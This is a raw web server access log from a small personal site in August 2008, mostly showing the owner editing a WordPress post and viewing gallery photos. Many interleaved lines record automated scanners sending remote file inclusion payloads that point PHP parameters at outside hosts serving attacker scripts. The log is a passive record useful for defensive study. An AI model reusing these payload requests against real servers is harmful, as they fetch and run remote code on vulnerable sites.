63.206.47.131 - - [18/Aug/2008:13:11:05 -0700] "GET /blog/wp-admin/js/media-upload.js?ver=20080109 HTTP/1.1" 200 430 "http://dmulk.com/blog/wp-admin/post-new.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:05 -0700] "GET /blog/wp-admin/images/media-button-video.gif HTTP/1.1" 200 68 "http://dmulk.com/blog/wp-admin/post-new.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:05 -0700] "GET /blog/wp-admin/images/media-button-image.gif HTTP/1.1" 200 69 "http://dmulk.com/blog/wp-admin/post-new.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:05 -0700] "GET /blog/wp-admin/images/media-button-music.gif HTTP/1.1" 200 188 "http://dmulk.com/blog/wp-admin/post-new.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:05 -0700] "GET /blog/wp-includes/js/quicktags.js?ver=3958 HTTP/1.1" 200 9648 "http://dmulk.com/blog/wp-admin/post-new.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:05 -0700] "GET /blog/wp-admin/images/media-button-other.gif HTTP/1.1" 200 141 "http://dmulk.com/blog/wp-admin/post-new.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:05 -0700] "GET /blog/wp-admin/images/date-button.gif HTTP/1.1" 200 111 "http://dmulk.com/blog/wp-admin/wp-admin.css?version=2.5.1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:05 -0700] "GET /blog/wp-admin/images/fade-butt.png HTTP/1.1" 200 785 "http://dmulk.com/blog/wp-admin/css/colors-fresh.css?version=2.5.1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:05 -0700] "GET /blog/wp-admin/images/toggle-arrow.gif HTTP/1.1" 200 71 "http://dmulk.com/blog/wp-admin/css/colors-fresh.css?version=2.5.1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:05 -0700] "GET /blog/wp-includes/js/thickbox/loadingAnimation.gif HTTP/1.1" 200 5886 "http://dmulk.com/blog/wp-admin/post-new.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
216.246.8.237 - - [18/Aug/2008:13:11:20 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.8.237 - - [18/Aug/2008:13:11:20 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:20 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 229 "http://dmulk.com/blog/wp-admin/post-new.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:20 -0700] "GET /blog/wp-admin/images/tail.gif HTTP/1.1" 200 98 "http://dmulk.com/blog/wp-admin/wp-admin.css?version=2.5.1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
74.52.66.242 - - [18/Aug/2008:13:11:21 -0700] "GET /logs/access_080624.log/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.2.246.201 - - [18/Aug/2008:13:11:31 -0700] "GET /logs/access_080724.log/phphtml.php?htmlclass_path=http://tvknob.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.46.202 - - [18/Aug/2008:13:11:37 -0700] "GET /logs/access_080224.log//?path%5Bdocroot%5D=http://www.lovasok.hu/admin/templates_c/idpula.txt? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:55 -0700] "GET /blog/wp-includes/js/thickbox/tb-close.png HTTP/1.1" 200 506 "http://dmulk.com/blog/wp-admin/post-new.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:56 -0700] "GET /blog/wp-admin/media-upload.php?post_id=-1219090263&type=video& HTTP/1.1" 200 8958 "http://dmulk.com/blog/wp-admin/post-new.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:56 -0700] "GET /blog/wp-includes/js/swfupload/swfupload.js?ver=2.0.2 HTTP/1.1" 200 38457 "http://dmulk.com/blog/wp-admin/media-upload.php?post_id=-1219090263&type=video&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:56 -0700] "GET /blog/wp-includes/js/swfupload/plugins/swfupload.graceful_degradation.js?ver=2.0.2 HTTP/1.1" 200 2639 "http://dmulk.com/blog/wp-admin/media-upload.php?post_id=-1219090263&type=video&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:56 -0700] "GET /blog/wp-includes/js/swfupload/plugins/swfupload.queue.js?ver=2.0.2 HTTP/1.1" 200 1785 "http://dmulk.com/blog/wp-admin/media-upload.php?post_id=-1219090263&type=video&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:56 -0700] "GET /blog/wp-includes/js/swfupload/handlers.js?ver=2.0.2-20080407 HTTP/1.1" 200 9207 "http://dmulk.com/blog/wp-admin/media-upload.php?post_id=-1219090263&type=video&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:56 -0700] "GET /blog/wp-admin/css/media.css?version=2.5.1 HTTP/1.1" 200 3821 "http://dmulk.com/blog/wp-admin/media-upload.php?post_id=-1219090263&type=video&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:57 -0700] "GET /blog/wp-includes/js/swfupload/swfupload_f9.swf HTTP/1.1" 200 9109 "http://dmulk.com/blog/wp-admin/media-upload.php?post_id=-1219090263&type=video&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
201.80.26.155 - - [18/Aug/2008:13:11:59 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://adamari.net/img/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:13:12:00 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://adamari.net/img/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:13:12:01 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://adamari.net/img/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:13:12:02 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://adamari.net/img/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:12:05 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 229 "http://dmulk.com/blog/wp-admin/post-new.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
74.55.109.34 - - [18/Aug/2008:13:12:09 -0700] "GET /logs/access_080624.log/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:12:12 -0700] "POST /blog/wp-admin/post.php HTTP/1.1" 302 17 "http://dmulk.com/blog/wp-admin/post-new.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:12:13 -0700] "GET /blog/wp-admin/post.php?action=edit&post=171&message=4 HTTP/1.1" 200 30086 "http://dmulk.com/blog/wp-admin/post-new.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:12:18 -0700] "GET /blog/?p=171&preview=true HTTP/1.1" 200 6904 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=171&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
67.15.58.12 - - [18/Aug/2008:13:12:31 -0700] "GET /logs/access_080717.log/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.58.12 - - [18/Aug/2008:13:12:33 -0700] "GET /?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 11043 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.58.12 - - [18/Aug/2008:13:12:33 -0700] "GET /logs/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 61141 "-" "libwww-perl/5.65" "www.dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:13:14 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=171&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
74.55.109.34 - - [18/Aug/2008:13:13:41 -0700] "GET /logs/access_080209.log//?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [18/Aug/2008:13:13:44 -0700] "GET /logs/access_080215.log//?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [18/Aug/2008:13:13:45 -0700] "GET //?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 10977 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [18/Aug/2008:13:13:46 -0700] "GET /logs//?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 61146 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [18/Aug/2008:13:13:50 -0700] "GET /logs/access_080624.log/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.44.140.111 - - [18/Aug/2008:13:13:58 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
141.44.140.111 - - [18/Aug/2008:13:13:59 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.38.12.204 - - [18/Aug/2008:13:13:59 -0700] "GET /logs/access_080624.log/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [18/Aug/2008:13:14:06 -0700] "GET /logs/access_080624.log/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:14:14 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=171&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
217.75.193.70 - - [18/Aug/2008:13:14:43 -0700] "GET /logs//?path%5Bdocroot%5D=http://lizartdisplay.com/di?? HTTP/1.1" 200 61146 "-" "libwww-perl/5.805" "www.dmulk.com"
217.75.193.70 - - [18/Aug/2008:13:14:44 -0700] "GET //?path%5Bdocroot%5D=http://lizartdisplay.com/di?? HTTP/1.1" 200 10946 "-" "libwww-perl/5.805" "www.dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:14:45 -0700] "POST /blog/wp-admin/post.php HTTP/1.1" 302 17 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=171&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
70.38.12.204 - - [18/Aug/2008:13:14:45 -0700] "GET /logs/access_080215.log//?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:14:46 -0700] "GET /blog/wp-admin/post.php?action=edit&post=171&message=4 HTTP/1.1" 200 30123 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=171&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
70.38.12.204 - - [18/Aug/2008:13:14:46 -0700] "GET //?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 10993 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [18/Aug/2008:13:14:46 -0700] "GET /logs//?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 61146 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [18/Aug/2008:13:14:50 -0700] "GET /logs/access_080215.log//?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [18/Aug/2008:13:14:50 -0700] "GET //?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 10993 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [18/Aug/2008:13:14:50 -0700] "GET /logs//?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 61146 "-" "libwww-perl/5.805" "www.dmulk.com"
208.98.1.215 - - [18/Aug/2008:13:14:57 -0700] "GET /logs/access_071229.log/forum.php?seite=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.98.1.215 - - [18/Aug/2008:13:14:57 -0700] "GET /forum.php?seite=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.98.1.215 - - [18/Aug/2008:13:14:57 -0700] "GET /logs/forum.php?seite=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:14:57 -0700] "GET /blog/?p=171&preview=true HTTP/1.1" 200 6910 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=171&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
74.6.22.125 - - [18/Aug/2008:13:15:07 -0700] "GET /bikes/dteel/DesertSTOC07/?M=D HTTP/1.0" 200 7603 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:15:11 -0700] "POST /blog/wp-admin/post.php HTTP/1.1" 302 17 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=171&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:15:11 -0700] "GET /blog/wp-admin/post.php?action=edit&post=171&message=4 HTTP/1.1" 200 31865 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=171&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
74.52.66.242 - - [18/Aug/2008:13:15:15 -0700] "GET /logs/access_080215.log//?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [18/Aug/2008:13:15:16 -0700] "GET //?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 9897 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [18/Aug/2008:13:15:17 -0700] "GET /logs//?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 61146 "-" "libwww-perl/5.812" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:13:15:18 -0700] "GET /?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 200 9860 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:13:15:19 -0700] "GET /?sourcedir=http://www.myboso.com/load.txt? HTTP/1.0" 200 9849 "-" "libwww-perl/5.53" "www.dmulk.com"
75.69.246.191 - - [18/Aug/2008:13:15:24 -0700] "GET /logs/access_080226.log/index.php?go=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.69.246.191 - - [18/Aug/2008:13:15:24 -0700] "GET /logs/index.php?go=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.69.246.191 - - [18/Aug/2008:13:15:25 -0700] "GET /index.php?go=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 200 9871 "-" "libwww-perl/5.79" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:13:15:34 -0700] "GET /?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 200 9860 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:13:15:34 -0700] "GET /?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 200 9860 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:13:15:35 -0700] "GET /?sourcedir=http://www.myboso.com/load.txt? HTTP/1.0" 200 9849 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:13:15:35 -0700] "GET /?sourcedir=http://www.myboso.com/load.txt? HTTP/1.0" 200 9849 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:13:15:39 -0700] "GET /?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 200 9860 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:13:15:39 -0700] "GET /?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 200 9860 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:13:15:40 -0700] "GET /?sourcedir=http://www.myboso.com/load.txt? HTTP/1.0" 200 9849 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:13:15:40 -0700] "GET /?sourcedir=http://www.myboso.com/load.txt? HTTP/1.0" 200 9849 "-" "libwww-perl/5.53" "www.dmulk.com"
67.15.58.12 - - [18/Aug/2008:13:15:53 -0700] "GET /logs/access_080624.log/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.58.12 - - [18/Aug/2008:13:15:55 -0700] "GET /logs/access_080624.log/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:16:13 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=171&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
61.100.30.4 - - [18/Aug/2008:13:16:19 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.100.30.4 - - [18/Aug/2008:13:16:20 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 200 9913 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.109.34 - - [18/Aug/2008:13:16:20 -0700] "GET /logs/access_080309.log//?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.100.30.4 - - [18/Aug/2008:13:16:21 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:16:24 -0700] "GET /blog/wp-login.php?action=logout HTTP/1.1" 302 17 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=171&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:16:24 -0700] "GET /blog/wp-login.php?loggedout=true HTTP/1.1" 200 1915 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=171&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:16:28 -0700] "GET /blog/ HTTP/1.1" 200 9814 "http://dmulk.com/blog/wp-login.php?loggedout=true" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:16:29 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=0&990 HTTP/1.1" 200 185990 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:16:29 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-143_0.jpg HTTP/1.1" 200 394995 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:16:35 -0700] "GET /blog/index.php/page/2/ HTTP/1.1" 200 10988 "http://dmulk.com/blog/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:16:36 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=5&250 HTTP/1.1" 200 3451 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:16:36 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=0&695 HTTP/1.1" 200 185990 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:16:36 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1022.jpg HTTP/1.1" 200 289866 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:16:36 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-121_0.jpg HTTP/1.1" 200 474198 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:16:39 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=0&898 HTTP/1.1" 200 185990 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:16:39 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0141.jpg HTTP/1.1" 200 378474 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:16:50 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-209.jpg HTTP/1.1" 200 387025 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
64.157.4.42 - - [18/Aug/2008:13:16:53 -0700] "GET /blog/wp-cron.php?check=c4f6ee563febd5ff08ef469b97b8a729 HTTP/1.0" 200 - "-" "-" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:17:02 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0062.jpg HTTP/1.1" 200 470360 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
208.98.1.215 - - [18/Aug/2008:13:17:10 -0700] "GET /forum.php?seite=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:17:13 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-129.jpg HTTP/1.1" 200 379596 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:17:24 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-021_2.jpg HTTP/1.1" 200 538232 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
